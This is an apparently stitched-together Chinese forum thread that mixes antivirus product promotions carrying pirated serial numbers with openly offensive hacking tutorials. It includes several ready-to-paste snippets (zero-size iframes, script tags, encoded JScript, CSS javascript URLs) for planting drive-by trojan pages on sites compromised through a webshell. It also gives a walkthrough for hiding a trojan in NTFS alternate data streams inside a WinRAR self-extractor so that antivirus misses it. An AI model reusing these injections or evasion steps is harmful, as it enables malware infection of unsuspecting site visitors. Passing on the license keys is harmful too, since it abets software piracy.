简称AVK，这是一款采用KAV（卡巴）和BitDefender（BD）罗马尼亚杀毒软件 的双引擎杀毒软件，具有超强的杀毒能力，在国外拥有非常高的知名度，运行速度稳定，具有病毒监控、EMAIL病毒拦截器、EMAIL防护、支持在线自动更新等功能，可以阻挡来自互联网的病毒、蠕虫、黑客后门、特洛伊木马、拨号程序、广告软件、间谍软件 等所有威胁，支持对压缩文件、电子邮件即时扫描，支持启发式病毒扫描，支持密码保护，有详细的日志方便查询，对计算机提供永久安全防护。AVK最大优点是，只要病毒或木马录入病毒库，它在病毒运行前拦截，不会出现中毒后再杀毒的情况。AVK2006目前病毒库已经超过33W 卡吧+BD 双杀毒引擎效果绝对一流！
AntiVirusKit InternetSecurity 2006 16.03
http://www.52shadu.cn/soft/15/2006/200606052114.html
AntiVirusKit2006 (AVK2006)木蚂蚁社区绿色版（v16.0.5）+KEY
http://www.eyabo.com/soft/7/76/3431.html
AntiVirusKit2006 （v16.0.7）专用精简版 （有升级KEY）
http://blog.sina.com.cn/u/55f2afbd010003lf
AntiVirusKit 2006 精简中文版
Name: fischer2815Serial : 7j1n1e
http://bbsnan.vicp.net/topic.cgi?forum=48&topic=27

第十二名的AVAST!
现在网上最火的杀软AVAST中文版
来自捷克的AVAST，已有17年的历史，但最近才在我们这里兴起，它在国外市场一直处于领先地位。
它的家庭版是免费得，只要在它的网页上填写一下资料，但是邮箱一定要写正确，这样它才能把使用KEY发给你,这你也就可以享用它14个月了，然后再注册再使用。
Avast！的实时监控功能十分强大！它拥有七大防护模块：网络防火墙防护、标准的本地文件读取防护、网页防护、即时通讯软件防护、邮件收发防护、P2P软件防护。这么完善的防护系统，定能让你的系统练就一副金刚不坏之身！任意开启各项保护模块能够查杀流氓软件,比如3721。升级很人性化， Avast是捷克一家软件公司(ALWILSoftware)的产品。ALWIL软件公司的研发机构在捷克的首都－布拉格，现在他们和世界上许多国家的安全软件机构都有良好的合作关系。
早在80年代末ALWIL公司的安全软件已经获得良好的市场占有率，但当时仅限于捷克地区。
ALMIL公司是擅长于安全软件方面的研发，开发的Avast Antivirus系列是他们的拳头产品，Avast在许多重要的市场和权威评奖中都取得了骄人的成绩，同样在此后进际市场上也赢得了良好的增长率。
主要特点：
（1）高侦测的反病毒表现，多次获得过ICSA和Virus Bulletin 100%认证，启发式强大。
（2）较低的内存占用和直观，简洁的使用界面。
（3）支持SKIN更换，完善的程序内存检测。
（4）对SMTP/POP3/IMAP邮件收发监控的全面保护。
（5）支持MSOUTLOOK外挂，智能型邮件帐号分析。
（6）支持宏病毒文档修复，修复档案后自动产生病毒还原数据库（VRDB功能）。
（7）支持P2P共享下载软件和即时通讯病毒检测，保护全面。
（8）良好有效的侦测并清除病毒，如虫，广告和木马程序
（9）病毒库更新速度快，对新型病毒和木马有迅捷的反应。
功能特性如下：
＊反病毒内核＊自动升级＊简单的使用界面＊病毒隔离区＊实时监控＊系统结合＊P2P和聊天软件监控保护＊病毒清除＊网络防护＊64位系统支持＊网页防护＊多国语言支持＊增强型用户界面＊恶意脚本屏蔽＊DOS下扫描＊扩展病毒库升级＊移除病毒备份， 占用内存不到25兆,让你老机器也流畅,在欧洲被称为唯一能与NOD32媲美的杀软，Avast! V4.7.844，高侦测反病毒软件、0613病毒库＊

绿色下载站免安装版
http://green.crsky.com/soft/3155.html
现在网上最火的杀软AVAST 4.7 Professional官方中文版下载(完全免费的正版,自动升级！)
http://www.avast.com/eng/download-avast-home.html
附：AVAST序列号：
S6039686R6039
W1106-FBYVE2MU
S7935192R4371
Z1106-S1BJD5AJ
S6945137R6826
L1106-WXH4K1SJ

撒旦

挂网页马的几个方法
一、最简单的也是最有效的
<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、js挂马
<script src=http://www.xxx.com/muma.js></script>

三、js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

muma.txt可改成任意后缀的。
四、不是嵌入了与iframe不同
top.document.body.innerHTML = top.document.body.innerHTML + &#39;\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>&#39;;
五、css中挂马
body {
background-image: url(&#39;javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")&#39;)}
题目：如何挂马 答:跟我来!


方法一：

一般在你入侵了一个站拿到了webshell的时候。最常见的 挂站代码如下 ：
<html>
<iframe src="http://192.168.1.3/inc/joke.htm" width="0" height="0" frameborder="0"></iframe>
</html>

把以上代码插到对方网页代码中，那么下次别人浏览了那个站点就会自动转向_blank>http://192.168.1.3/inc/joke.htm。而_blank>http://192.168.1.3/inc/joke.htm也就是我门的网页木马了，那width="0" height="0"又是什么意思呢？width就是宽而height自然就是高了。我们把它设置为0也就是不显示了，对方也就看不见我们的这个页面，木马也就会被下载到本地。

方法二：

<SCRIPT language=javascript>
window.open("http://192.168.1.3/inc/joke.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
打开网站的同时也就打开了我们的是不是比上面的那个隐蔽了些。如果粗心的管理员在搜索了iframe没结果后，放弃了检查这个页面，那你不是拣了大便宜了！这里我把width和height的值设置为1了，不错！就是1，因为我在用0测试了N次后，发现打开页面弹出我们的木马页是满屏显示的
其实我们还可以简单装饰一下那个页面的，让弹出一个我们伪造的广告，达到欺骗的效果！至于怎么伪装就看你自己发挥了。还有几种方法在这里就不一一列举了，flash木马也很厉害的哦。

方法三：

还有一点就是比较隐蔽的那就是使用js文件
主页只有一个<script language=javascript src=./inc/bbsxp.js></script>
js内容可以为documnet.write("" "" 中可为任何html代码..)
document.write("<iframe height=0 width=0 src=&#39;http://192.168.1.3/inc/joke.htm&#39; name=hiddenframe></iframe>")
此招相当隐蔽.......实战就不用说了..............

方法四：
代码加进包含文件<!--#include file="conn.asp"-->


NTFS文件流与RAR联手打造免杀木马
也许从标题就可知道本文的大概意思了，不错！今天我要讲的就是NTFS文件流如何与WINRAR联手“加壳”木马。

小知识：流（STREAM）是NTFS下的概念，目前只有NTFS支持流。流依附于文件而存在，可以在流中存储2进制数据，文字或者其它一些东西。每个文件可以含有多个流，当流所依附的文件被删除，流也随之消失。流的名字和文件名以“：”分隔，例如：ABC：A.ABC就是文件名，而流的名字为“A.”，当我们操作流时，可以用如下的简单方法：

ECHO STREAM1>ABC：STREAM1

ECHO STREAM2>ABC：STREAM2

现在，ABC就有了“：STREAM1”和“：STREAM2”共2个流，而读出流可以用：

MORE MORE

废话不多说，我先介绍一下本文使用的工具：为了方便写文件流而编写的VBS脚本(Together.vbs)，它可以把一个文件随意附在你想附的文件中，意思就是我们可以把我们的木马文件放到一个不起眼的文件中。

首先如何用工具生成一个附在文件夹的文件流，也就是流文件名为“：*”的形式呢？先建个空的文件夹，如“muma”，之后在文件夹的同一目录上运行“together.vbs”，填写方法如图1所示：

首先要填的就是你想打造的木马（由于我手头没有什么木马，只好找“webdav.exe”当木马了，注意KV是要杀Webdav.exe的哦）。要注意的是木马的位置要和“together.vbs”同一目录，不然会出现找不到文件的提示，接着就要填的就是你想把你的木马依随在那个文件或文件夹（最好是文件夹）。如果是文件夹的就应这样填：例如是附在“muma”（刚才第一步建的文件夹）这个文件夹上的，就写“muma”。填写完后按“确定”生成，将提示成功。

好了，NTFS文件就生成了。难道这就是我们最后的结果吗？这和黑防原来介绍的NTFS数据流木马是同样的道理，只不过是用脚本实现的而已，没有什么新意嘛！别忘了文章标题，我们还有RAR没有使用哦！

蝴蝶：是不是觉得有点意外？天天与WINRAR打交道居然不知道它有这个功能。或许每个Windows的漏洞也在天天和人打交道，又有几个人发现了它们呢？

下一步出动我们的主角“WINRAR”，对着我们刚才用VBS做出来的文件夹点击右键，选择“添加到压缩文件”。

之后选择“生成自解压包”再选择“高级”选项卡，来到刚才图4那里，按图4那样勾选“保存文件流数据”，然后来到“自解压选项”里“常规”选项。注意在“解压后运行”项目中根据先前做得木马来填，如“muma：webdav.Exe”。在这里我注重的是讲解如何联合WINRAR构造木马，其它参数可根据个人喜好来填写。

到这里，这个木马基本上已经弄好了，只差一步：生成自解压包，大家点点鼠标就能实现了。下面是我已生成的文件的运行状态。

是不是觉得有点怪怪的？“WebDavScan”这个程序运行了，在进程中却没有见到它的踪影，只有“muma”这个刚生成的自解包的进程，可能秘密就在里面。由于这个程序是被KV2004列为病毒的，我们现在来看看能不能查出来。

如果是用WINRAR打包的文件流，KV2004是查不出来的，至于内存里也没有发现什么异常，看来这种方法还行得通哦！不过本文的只适合于Windows 2000以上的NTFS文件分区格式。

好了，文件就简单的介绍到这里了，大家现在可以方便的打造自己的不被杀的木马了！

zzs

引用第6楼黑夜幽灵于2008-11-04 20:34发表的:
您可真是积极啊

看得出来，楼主很积极